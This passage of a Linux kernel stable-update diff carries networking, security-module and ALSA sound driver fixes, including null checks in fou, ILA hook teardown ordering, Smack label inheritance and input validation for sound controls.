+ 			bo->bound   = 0;
+ 			bo->ifindex = 0;
+ 			notify_enodev = 1;
+diff --git a/net/ipv4/fou.c b/net/ipv4/fou.c
+index 358bff068eef8..7bcc933103e2d 100644
+--- a/net/ipv4/fou.c
++++ b/net/ipv4/fou.c
+@@ -48,7 +48,7 @@ struct fou_net {
+ 
+ static inline struct fou *fou_from_sock(struct sock *sk)
+ {
+-	return sk->sk_user_data;
++	return rcu_dereference_sk_user_data(sk);
+ }
+ 
+ static int fou_recv_pull(struct sk_buff *skb, struct fou *fou, size_t len)
+@@ -231,9 +231,15 @@ static struct sk_buff *fou_gro_receive(struct sock *sk,
+ 				       struct sk_buff *skb)
+ {
+ 	const struct net_offload __rcu **offloads;
+-	u8 proto = fou_from_sock(sk)->protocol;
++	struct fou *fou = fou_from_sock(sk);
+ 	const struct net_offload *ops;
+ 	struct sk_buff *pp = NULL;
++	u8 proto;
++
++	if (!fou)
++		goto out;
++
++	proto = fou->protocol;
+ 
+ 	/* We can clear the encap_mark for FOU as we are essentially doing
+ 	 * one of two possible things.  We are either adding an L4 tunnel
+@@ -261,14 +267,24 @@ static int fou_gro_complete(struct sock *sk, struct sk_buff *skb,
+ 			    int nhoff)
+ {
+ 	const struct net_offload __rcu **offloads;
+-	u8 proto = fou_from_sock(sk)->protocol;
++	struct fou *fou = fou_from_sock(sk);
+ 	const struct net_offload *ops;
+-	int err = -ENOSYS;
++	u8 proto;
++	int err;
++
++	if (!fou) {
++		err = -ENOENT;
++		goto out;
++	}
++
++	proto = fou->protocol;
+ 
+ 	offloads = NAPI_GRO_CB(skb)->is_ipv6 ? inet6_offloads : inet_offloads;
+ 	ops = rcu_dereference(offloads[proto]);
+-	if (WARN_ON(!ops || !ops->callbacks.gro_complete))
++	if (WARN_ON(!ops || !ops->callbacks.gro_complete)) {
++		err = -ENOSYS;
+ 		goto out;
++	}
+ 
+ 	err = ops->callbacks.gro_complete(skb, nhoff);
+ 
+@@ -318,6 +334,9 @@ static struct sk_buff *gue_gro_receive(struct sock *sk,
+ 	struct gro_remcsum grc;
+ 	u8 proto;
+ 
++	if (!fou)
++		goto out;
++
+ 	skb_gro_remcsum_init(&grc);
+ 
+ 	off = skb_gro_offset(skb);
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index f8037d142bb75..07a896685d0d3 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -572,7 +572,7 @@ static int tcp_bpf_sendmsg(struct sock *sk, struct msghdr *msg, size_t size)
+ 		err = sk_stream_error(sk, msg->msg_flags, err);
+ 	release_sock(sk);
+ 	sk_psock_put(sk, psock);
+-	return copied ? copied : err;
++	return copied > 0 ? copied : err;
+ }
+ 
+ static int tcp_bpf_sendpage(struct sock *sk, struct page *page, int offset,
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index b1b4f44d21370..4c7a2702d904d 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -5843,6 +5843,11 @@ static bool tcp_validate_incoming(struct sock *sk, struct sk_buff *skb,
+ 	 * RFC 5961 4.2 : Send a challenge ack
+ 	 */
+ 	if (th->syn) {
++		if (sk->sk_state == TCP_SYN_RECV && sk->sk_socket && th->ack &&
++		    TCP_SKB_CB(skb)->seq + 1 == TCP_SKB_CB(skb)->end_seq &&
++		    TCP_SKB_CB(skb)->seq + 1 == tp->rcv_nxt &&
++		    TCP_SKB_CB(skb)->ack_seq == tp->snd_nxt)
++			goto pass;
+ syn_challenge:
+ 		if (syn_inerr)
+ 			TCP_INC_STATS(sock_net(sk), TCP_MIB_INERRS);
+@@ -5852,6 +5857,7 @@ static bool tcp_validate_incoming(struct sock *sk, struct sk_buff *skb,
+ 		goto discard;
+ 	}
+ 
++pass:
+ 	bpf_skops_parse_hdr(sk, skb);
+ 
+ 	return true;
+diff --git a/net/ipv6/ila/ila.h b/net/ipv6/ila/ila.h
+index ad5f6f6ba3330..85b92917849bf 100644
+--- a/net/ipv6/ila/ila.h
++++ b/net/ipv6/ila/ila.h
+@@ -108,6 +108,7 @@ int ila_lwt_init(void);
+ void ila_lwt_fini(void);
+ 
+ int ila_xlat_init_net(struct net *net);
++void ila_xlat_pre_exit_net(struct net *net);
+ void ila_xlat_exit_net(struct net *net);
+ 
+ int ila_xlat_nl_cmd_add_mapping(struct sk_buff *skb, struct genl_info *info);
+diff --git a/net/ipv6/ila/ila_main.c b/net/ipv6/ila/ila_main.c
+index 3faf62530d6a4..cba81158a24e1 100644
+--- a/net/ipv6/ila/ila_main.c
++++ b/net/ipv6/ila/ila_main.c
+@@ -72,6 +72,11 @@ static __net_init int ila_init_net(struct net *net)
+ 	return err;
+ }
+ 
++static __net_exit void ila_pre_exit_net(struct net *net)
++{
++	ila_xlat_pre_exit_net(net);
++}
++
+ static __net_exit void ila_exit_net(struct net *net)
+ {
+ 	ila_xlat_exit_net(net);
+@@ -79,6 +84,7 @@ static __net_exit void ila_exit_net(struct net *net)
+ 
+ static struct pernet_operations ila_net_ops = {
+ 	.init = ila_init_net,
++	.pre_exit = ila_pre_exit_net,
+ 	.exit = ila_exit_net,
+ 	.id   = &ila_net_id,
+ 	.size = sizeof(struct ila_net),
+diff --git a/net/ipv6/ila/ila_xlat.c b/net/ipv6/ila/ila_xlat.c
+index bee45dfeb1874..2e7a36a1ea0a8 100644
+--- a/net/ipv6/ila/ila_xlat.c
++++ b/net/ipv6/ila/ila_xlat.c
+@@ -620,6 +620,15 @@ int ila_xlat_init_net(struct net *net)
+ 	return 0;
+ }
+ 
++void ila_xlat_pre_exit_net(struct net *net)
++{
++	struct ila_net *ilan = net_generic(net, ila_net_id);
++
++	if (ilan->xlat.hooks_registered)
++		nf_unregister_net_hooks(net, ila_nf_hook_ops,
++					ARRAY_SIZE(ila_nf_hook_ops));
++}
++
+ void ila_xlat_exit_net(struct net *net)
+ {
+ 	struct ila_net *ilan = net_generic(net, ila_net_id);
+@@ -627,10 +636,6 @@ void ila_xlat_exit_net(struct net *net)
+ 	rhashtable_free_and_destroy(&ilan->xlat.rhash_table, ila_free_cb, NULL);
+ 
+ 	free_bucket_spinlocks(ilan->xlat.locks);
+-
+-	if (ilan->xlat.hooks_registered)
+-		nf_unregister_net_hooks(net, ila_nf_hook_ops,
+-					ARRAY_SIZE(ila_nf_hook_ops));
+ }
+ 
+ static int ila_xlat_addr(struct sk_buff *skb, bool sir2ila)
+diff --git a/net/netfilter/nf_conncount.c b/net/netfilter/nf_conncount.c
+index 5d8ed6c90b7ef..5885810da412f 100644
+--- a/net/netfilter/nf_conncount.c
++++ b/net/netfilter/nf_conncount.c
+@@ -321,7 +321,6 @@ insert_tree(struct net *net,
+ 	struct nf_conncount_rb *rbconn;
+ 	struct nf_conncount_tuple *conn;
+ 	unsigned int count = 0, gc_count = 0;
+-	u8 keylen = data->keylen;
+ 	bool do_gc = true;
+ 
+ 	spin_lock_bh(&nf_conncount_locks[hash]);
+@@ -333,7 +332,7 @@ insert_tree(struct net *net,
+ 		rbconn = rb_entry(*rbnode, struct nf_conncount_rb, node);
+ 
+ 		parent = *rbnode;
+-		diff = key_diff(key, rbconn->key, keylen);
++		diff = key_diff(key, rbconn->key, data->keylen);
+ 		if (diff < 0) {
+ 			rbnode = &((*rbnode)->rb_left);
+ 		} else if (diff > 0) {
+@@ -378,7 +377,7 @@ insert_tree(struct net *net,
+ 
+ 	conn->tuple = *tuple;
+ 	conn->zone = *zone;
+-	memcpy(rbconn->key, key, sizeof(u32) * keylen);
++	memcpy(rbconn->key, key, sizeof(u32) * data->keylen);
+ 
+ 	nf_conncount_list_init(&rbconn->list);
+ 	list_add(&conn->node, &rbconn->list.head);
+@@ -403,7 +402,6 @@ count_tree(struct net *net,
+ 	struct rb_node *parent;
+ 	struct nf_conncount_rb *rbconn;
+ 	unsigned int hash;
+-	u8 keylen = data->keylen;
+ 
+ 	hash = jhash2(key, data->keylen, conncount_rnd) % CONNCOUNT_SLOTS;
+ 	root = &data->root[hash];
+@@ -414,7 +412,7 @@ count_tree(struct net *net,
+ 
+ 		rbconn = rb_entry(parent, struct nf_conncount_rb, node);
+ 
+-		diff = key_diff(key, rbconn->key, keylen);
++		diff = key_diff(key, rbconn->key, data->keylen);
+ 		if (diff < 0) {
+ 			parent = rcu_dereference_raw(parent->rb_left);
+ 		} else if (diff > 0) {
+diff --git a/net/sched/sch_cake.c b/net/sched/sch_cake.c
+index 3ed0c33421893..73e8caeffd47e 100644
+--- a/net/sched/sch_cake.c
++++ b/net/sched/sch_cake.c
+@@ -785,12 +785,15 @@ static u32 cake_hash(struct cake_tin_data *q, const struct sk_buff *skb,
+ 		 * queue, accept the collision, update the host tags.
+ 		 */
+ 		q->way_collisions++;
+-		if (q->flows[outer_hash + k].set == CAKE_SET_BULK) {
+-			q->hosts[q->flows[reduced_hash].srchost].srchost_bulk_flow_count--;
+-			q->hosts[q->flows[reduced_hash].dsthost].dsthost_bulk_flow_count--;
+-		}
+ 		allocate_src = cake_dsrc(flow_mode);
+ 		allocate_dst = cake_ddst(flow_mode);
++
++		if (q->flows[outer_hash + k].set == CAKE_SET_BULK) {
++			if (allocate_src)
++				q->hosts[q->flows[reduced_hash].srchost].srchost_bulk_flow_count--;
++			if (allocate_dst)
++				q->hosts[q->flows[reduced_hash].dsthost].dsthost_bulk_flow_count--;
++		}
+ found:
+ 		/* reserve queue for future packets in same flow */
+ 		reduced_hash = outer_hash + k;
+diff --git a/net/sched/sch_netem.c b/net/sched/sch_netem.c
+index a18b24c125f4e..0eba06613dcde 100644
+--- a/net/sched/sch_netem.c
++++ b/net/sched/sch_netem.c
+@@ -733,11 +733,10 @@ static struct sk_buff *netem_dequeue(struct Qdisc *sch)
+ 
+ 				err = qdisc_enqueue(skb, q->qdisc, &to_free);
+ 				kfree_skb_list(to_free);
+-				if (err != NET_XMIT_SUCCESS &&
+-				    net_xmit_drop_count(err)) {
+-					qdisc_qstats_drop(sch);
+-					qdisc_tree_reduce_backlog(sch, 1,
+-								  pkt_len);
++				if (err != NET_XMIT_SUCCESS) {
++					if (net_xmit_drop_count(err))
++						qdisc_qstats_drop(sch);
++					qdisc_tree_reduce_backlog(sch, 1, pkt_len);
+ 				}
+ 				goto tfifo_dequeue;
+ 			}
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 7d59f9a6c9046..5ce60087086c2 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -680,9 +680,6 @@ static void init_peercred(struct sock *sk)
+ 
+ static void copy_peercred(struct sock *sk, struct sock *peersk)
+ {
+-	const struct cred *old_cred;
+-	struct pid *old_pid;
+-
+ 	if (sk < peersk) {
+ 		spin_lock(&sk->sk_peer_lock);
+ 		spin_lock_nested(&peersk->sk_peer_lock, SINGLE_DEPTH_NESTING);
+@@ -690,16 +687,12 @@ static void copy_peercred(struct sock *sk, struct sock *peersk)
+ 		spin_lock(&peersk->sk_peer_lock);
+ 		spin_lock_nested(&sk->sk_peer_lock, SINGLE_DEPTH_NESTING);
+ 	}
+-	old_pid = sk->sk_peer_pid;
+-	old_cred = sk->sk_peer_cred;
++
+ 	sk->sk_peer_pid  = get_pid(peersk->sk_peer_pid);
+ 	sk->sk_peer_cred = get_cred(peersk->sk_peer_cred);
+ 
+ 	spin_unlock(&sk->sk_peer_lock);
+ 	spin_unlock(&peersk->sk_peer_lock);
+-
+-	put_pid(old_pid);
+-	put_cred(old_cred);
+ }
+ 
+ static int unix_listen(struct socket *sock, int backlog)
+diff --git a/rust/Makefile b/rust/Makefile
+index 6d0c0e9757f21..28ba3b9ee18dd 100644
+--- a/rust/Makefile
++++ b/rust/Makefile
+@@ -303,9 +303,7 @@ $(obj)/bindings/bindings_helpers_generated.rs: $(src)/helpers.c FORCE
+ quiet_cmd_exports = EXPORTS $@
+       cmd_exports = \
+ 	$(NM) -p --defined-only $< \
+-		| grep -E ' (T|R|D) ' | cut -d ' ' -f 3 \
+-		| xargs -Isymbol \
+-		echo 'EXPORT_SYMBOL_RUST_GPL(symbol);' > $@
++		| awk '/ (T|R|D|B) / {printf "EXPORT_SYMBOL_RUST_GPL(%s);\n",$$3}' > $@
+ 
+ $(obj)/exports_core_generated.h: $(obj)/core.o FORCE
+ 	$(call if_changed,exports)
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index 75b3e91d5a5f8..c18366dbbfed1 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -3706,12 +3706,18 @@ static int smack_unix_stream_connect(struct sock *sock,
+ 		}
+ 	}
+ 
+-	/*
+-	 * Cross reference the peer labels for SO_PEERSEC.
+-	 */
+ 	if (rc == 0) {
++		/*
++		 * Cross reference the peer labels for SO_PEERSEC.
++		 */
+ 		nsp->smk_packet = ssp->smk_out;
+ 		ssp->smk_packet = osp->smk_out;
++
++		/*
++		 * new/child/established socket must inherit listening socket labels
++		 */
++		nsp->smk_out = osp->smk_out;
++		nsp->smk_in  = osp->smk_in;
+ 	}
+ 
+ 	return rc;
+diff --git a/sound/core/control.c b/sound/core/control.c
+index 82aa1af1d1d87..92266c97238da 100644
+--- a/sound/core/control.c
++++ b/sound/core/control.c
+@@ -1477,12 +1477,16 @@ static int snd_ctl_elem_user_get(struct snd_kcontrol *kcontrol,
+ static int snd_ctl_elem_user_put(struct snd_kcontrol *kcontrol,
+ 				 struct snd_ctl_elem_value *ucontrol)
+ {
+-	int change;
++	int err, change;
+ 	struct user_element *ue = kcontrol->private_data;
+ 	unsigned int size = ue->elem_data_size;
+ 	char *dst = ue->elem_data +
+ 			snd_ctl_get_ioff(kcontrol, &ucontrol->id) * size;
+ 
++	err = sanity_check_input_values(ue->card, ucontrol, &ue->info, false);
++	if (err < 0)
++		return err;
++
+ 	change = memcmp(&ucontrol->value, dst, size) != 0;
+ 	if (change)
+ 		memcpy(dst, &ucontrol->value, size);
+diff --git a/sound/hda/hdmi_chmap.c b/sound/hda/hdmi_chmap.c
+index 5d8e1d944b0af..7b276047f85a7 100644
+--- a/sound/hda/hdmi_chmap.c
++++ b/sound/hda/hdmi_chmap.c
+@@ -753,6 +753,20 @@ static int hdmi_chmap_ctl_get(struct snd_kcontrol *kcontrol,
+ 	return 0;
+ }
+ 
++/* a simple sanity check for input values to chmap kcontrol */
++static int chmap_value_check(struct hdac_chmap *hchmap,
++			     const struct snd_ctl_elem_value *ucontrol)
++{
++	int i;
++
++	for (i = 0; i < hchmap->channels_max; i++) {
++		if (ucontrol->value.integer.value[i] < 0 ||
++		    ucontrol->value.integer.value[i] > SNDRV_CHMAP_LAST)
++			return -EINVAL;
++	}
++	return 0;
++}
++
+ static int hdmi_chmap_ctl_put(struct snd_kcontrol *kcontrol,
+ 			      struct snd_ctl_elem_value *ucontrol)
+ {
+@@ -764,6 +778,10 @@ static int hdmi_chmap_ctl_put(struct snd_kcontrol *kcontrol,
+ 	unsigned char chmap[8], per_pin_chmap[8];
+ 	int i, err, ca, prepared = 0;
+ 
++	err = chmap_value_check(hchmap, ucontrol);
++	if (err < 0)
++		return err;
++
+ 	/* No monitor is connected in dyn_pcm_assign.
+ 	 * It's invalid to setup the chmap
+ 	 */
+diff --git a/sound/pci/hda/patch_conexant.c b/sound/pci/hda/patch_conexant.c
+index 8396d1d93668c..63bd0e384bae2 100644
+--- a/sound/pci/hda/patch_conexant.c
++++ b/sound/pci/hda/patch_conexant.c
+@@ -311,6 +311,7 @@ enum {
+ 	CXT_FIXUP_HEADSET_MIC,
+ 	CXT_FIXUP_HP_MIC_NO_PRESENCE,
+ 	CXT_PINCFG_SWS_JS201D,
++	CXT_PINCFG_TOP_SPEAKER,
+ };
+ 
+ /* for hda_fixup_thinkpad_acpi() */
+@@ -978,6 +979,13 @@ static const struct hda_fixup cxt_fixups[] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = cxt_pincfg_sws_js201d,
+ 	},
++	[CXT_PINCFG_TOP_SPEAKER] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x1d, 0x82170111 },
++			{ }
++		},
++	},
+ };
+ 
+ static const struct snd_pci_quirk cxt5045_fixups[] = {
+@@ -1074,6 +1082,8 @@ static const struct snd_pci_quirk cxt5066_fixups[] = {
+ 	SND_PCI_QUIRK_VENDOR(0x17aa, "Thinkpad", CXT_FIXUP_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x1c06, 0x2011, "Lemote A1004", CXT_PINCFG_LEMOTE_A1004),
+ 	SND_PCI_QUIRK(0x1c06, 0x2012, "Lemote A1205", CXT_PINCFG_LEMOTE_A1205),
++	SND_PCI_QUIRK(0x2782, 0x12c3, "Sirius Gen1", CXT_PINCFG_TOP_SPEAKER),
++	SND_PCI_QUIRK(0x2782, 0x12c5, "Sirius Gen2", CXT_PINCFG_TOP_SPEAKER),
+ 	{}
+ };
+ 
+@@ -1093,6 +1103,7 @@ static const struct hda_model_fixup cxt5066_fixup_models[] = {
+ 	{ .id = CXT_FIXUP_HP_MIC_NO_PRESENCE, .name = "hp-mic-fix" },
+ 	{ .id = CXT_PINCFG_LENOVO_NOTEBOOK, .name = "lenovo-20149" },
+ 	{ .id = CXT_PINCFG_SWS_JS201D, .name = "sws-js201d" },
++	{ .id = CXT_PINCFG_TOP_SPEAKER, .name = "sirius-top-speaker" },
+ 	{}
+ };
+ 
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index b942ed868070d..d869d6ba96f3d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7289,6 +7289,7 @@ enum {
+ 	ALC236_FIXUP_HP_GPIO_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED,
+ 	ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF,
++	ALC236_FIXUP_LENOVO_INV_DMIC,
+ 	ALC298_FIXUP_SAMSUNG_AMP,
+ 	ALC298_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET,
+ 	ALC256_FIXUP_SAMSUNG_HEADPHONE_VERY_QUIET,
+@@ -8805,6 +8806,12 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc236_fixup_hp_mute_led_micmute_vref,
+ 	},
++	[ALC236_FIXUP_LENOVO_INV_DMIC] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc_fixup_inv_dmic,
++		.chained = true,
++		.chain_id = ALC283_FIXUP_INT_MIC,
++	},
+ 	[ALC298_FIXUP_SAMSUNG_AMP] = {
+ 		.type = HDA_FIXUP_FUNC,
+ 		.v.func = alc298_fixup_samsung_amp,
+@@ -9710,6 +9717,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x87f5, "HP", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x87f6, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
+ 	SND_PCI_QUIRK(0x103c, 0x87f7, "HP Spectre x360 14", ALC245_FIXUP_HP_X360_AMP),
++	SND_PCI_QUIRK(0x103c, 0x87fd, "HP Laptop 14-dq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x87fe, "HP Laptop 15s-fq2xxx", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8805, "HP ProBook 650 G8 Notebook PC", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x880d, "HP EliteBook 830 G8 Notebook PC", ALC285_FIXUP_HP_GPIO_LED),
+@@ -10111,6 +10119,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3866, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x3869, "Lenovo Yoga7 14IAL7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3902, "Lenovo E50-80", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x3913, "Lenovo 145", ALC236_FIXUP_LENOVO_INV_DMIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3977, "IdeaPad S210", ALC283_FIXUP_INT_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3978, "Lenovo B50-70", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x3bf8, "Quanta FL1", ALC269_FIXUP_PCM_44K),
+@@ -10359,6 +10368,7 @@ static const struct hda_model_fixup alc269_fixup_models[] = {
+ 	{.id = ALC623_FIXUP_LENOVO_THINKSTATION_P340, .name = "alc623-lenovo-thinkstation-p340"},
+ 	{.id = ALC255_FIXUP_ACER_HEADPHONE_AND_MIC, .name = "alc255-acer-headphone-and-mic"},
+ 	{.id = ALC285_FIXUP_HP_GPIO_AMP_INIT, .name = "alc285-hp-amp-init"},
++	{.id = ALC236_FIXUP_LENOVO_INV_DMIC, .name = "alc236-fixup-lenovo-inv-mic"},
+ 	{}
+ };
+ #define ALC225_STANDARD_PINS \
+diff --git a/sound/soc/soc-dapm.c b/sound/soc/soc-dapm.c
+index 6eb8c6cb5e673..4103443770b03 100644
+--- a/sound/soc/soc-dapm.c
++++ b/sound/soc/soc-dapm.c
+@@ -4018,6 +4018,7 @@ static int snd_soc_dai_link_event(struct snd_soc_dapm_widget *w,
+ 
+ 	case SND_SOC_DAPM_POST_PMD:
+ 		kfree(substream->runtime);
++		substream->runtime = NULL;
+ 		break;
+ 
+ 	default:
+diff --git a/sound/soc/soc-topology.c b/sound/soc/soc-topology.c
+index fcb8a36d4a06c..77296c9503767 100644
+--- a/sound/soc/soc-topology.c
++++ b/sound/soc/soc-topology.c
+@@ -889,6 +889,8 @@ static int soc_tplg_denum_create_values(struct soc_tplg *tplg, struct soc_enum *
+ 		se->dobj.control.dvalues[i] = le32_to_cpu(ec->values[i]);
+ 	}
+ 
++	se->items = le32_to_cpu(ec->items);
++	se->values = (const unsigned int *)se->dobj.control.dvalues;
+ 	return 0;
+ }
+ 
+diff --git a/sound/soc/sof/topology.c b/sound/soc/sof/topology.c
+index e7305ce57ea1f..374c8b1d69584 100644
+--- a/sound/soc/sof/topology.c
++++ b/sound/soc/sof/topology.c
+@@ -1817,6 +1817,8 @@ static int sof_link_unload(struct snd_soc_component *scomp, struct snd_soc_dobj
+ 	if (!slink)
+ 		return 0;
+ 
++	slink->link->platforms->name = NULL;
++
+ 	kfree(slink->tuples);
+ 	list_del(&slink->list);
+ 	kfree(slink->hw_configs);
+diff --git a/sound/soc/sunxi/sun4i-i2s.c b/sound/soc/sunxi/sun4i-i2s.c
+index 6028871825bae..47faaf849de0b 100644
+--- a/sound/soc/sunxi/sun4i-i2s.c
++++ b/sound/soc/sunxi/sun4i-i2s.c
+@@ -100,8 +100,8 @@
+ #define SUN8I_I2S_CTRL_MODE_PCM			(0 << 4)
+ 
+ #define SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK	BIT(19)
+-#define SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED		(1 << 19)
+-#define SUN8I_I2S_FMT0_LRCLK_POLARITY_NORMAL		(0 << 19)
++#define SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH	(1 << 19)
++#define SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW		(0 << 19)
+ #define SUN8I_I2S_FMT0_LRCK_PERIOD_MASK		GENMASK(17, 8)
+ #define SUN8I_I2S_FMT0_LRCK_PERIOD(period)	((period - 1) << 8)
+ #define SUN8I_I2S_FMT0_BCLK_POLARITY_MASK	BIT(7)
+@@ -727,65 +727,37 @@ static int sun4i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 				 unsigned int fmt)
+ {
+-	u32 mode, val;
++	u32 mode, lrclk_pol, bclk_pol, val;
+ 	u8 offset;
+ 
+-	/*
+-	 * DAI clock polarity
+-	 *
+-	 * The setup for LRCK contradicts the datasheet, but under a
+-	 * scope it's clear that the LRCK polarity is reversed
+-	 * compared to the expected polarity on the bus.
+-	 */
+-	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
+-	case SND_SOC_DAIFMT_IB_IF:
+-		/* Invert both clocks */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_IB_NF:
+-		/* Invert bit clock */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED |
+-		      SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_NB_IF:
+-		/* Invert frame clock */
+-		val = 0;
+-		break;
+-	case SND_SOC_DAIFMT_NB_NF:
+-		val = SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
+-			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
+-			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
+-			   val);
+-
+ 	/* DAI Mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_DSP_A:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_DSP_B:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_PCM;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_I2S:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_LOW;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 1;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_LEFT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_LEFT;
+ 		offset = 0;
+ 		break;
+ 
+ 	case SND_SOC_DAIFMT_RIGHT_J:
++		lrclk_pol = SUN8I_I2S_FMT0_LRCLK_POLARITY_START_HIGH;
+ 		mode = SUN8I_I2S_CTRL_MODE_RIGHT;
+ 		offset = 0;
+ 		break;
+@@ -803,6 +775,35 @@ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 			   SUN8I_I2S_TX_CHAN_OFFSET_MASK,
+ 			   SUN8I_I2S_TX_CHAN_OFFSET(offset));
+ 
++	/* DAI clock polarity */
++	bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_NORMAL;
++
++	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
++	case SND_SOC_DAIFMT_IB_IF:
++		/* Invert both clocks */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_IB_NF:
++		/* Invert bit clock */
++		bclk_pol = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
++		break;
++	case SND_SOC_DAIFMT_NB_IF:
++		/* Invert frame clock */
++		lrclk_pol ^= SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK;
++		break;
++	case SND_SOC_DAIFMT_NB_NF:
++		/* No inversion */
++		break;
++	default:
++		return -EINVAL;
++	}
++
++	regmap_update_bits(i2s->regmap, SUN4I_I2S_FMT0_REG,
++			   SUN8I_I2S_FMT0_LRCLK_POLARITY_MASK |
++			   SUN8I_I2S_FMT0_BCLK_POLARITY_MASK,
++			   lrclk_pol | bclk_pol);
++
+ 	/* DAI clock master masks */
+ 	switch (fmt & SND_SOC_DAIFMT_CLOCK_PROVIDER_MASK) {
+ 	case SND_SOC_DAIFMT_BP_FP:
+@@ -834,65 +835,37 @@ static int sun8i_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ static int sun50i_h6_i2s_set_soc_fmt(const struct sun4i_i2s *i2s,
+ 				     unsigned int fmt)
+ {
+-	u32 mode, val;
++	u32 mode, lrclk_pol, bclk_pol, val;
+ 	u8 offset;
+ 
+-	/*
+-	 * DAI clock polarity
+-	 *
+-	 * The setup for LRCK contradicts the datasheet, but under a
+-	 * scope it's clear that the LRCK polarity is reversed
+-	 * compared to the expected polarity on the bus.
+-	 */
+-	switch (fmt & SND_SOC_DAIFMT_INV_MASK) {
+-	case SND_SOC_DAIFMT_IB_IF:
+-		/* Invert both clocks */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_IB_NF:
+-		/* Invert bit clock */
+-		val = SUN8I_I2S_FMT0_BCLK_POLARITY_INVERTED |
+-		      SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	case SND_SOC_DAIFMT_NB_IF:
+-		/* Invert frame clock */
+-		val = 0;
+-		break;
+-	case SND_SOC_DAIFMT_NB_NF:
+-		val = SUN8I_I2S_FMT0_LRCLK_POLARITY_INVERTED;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
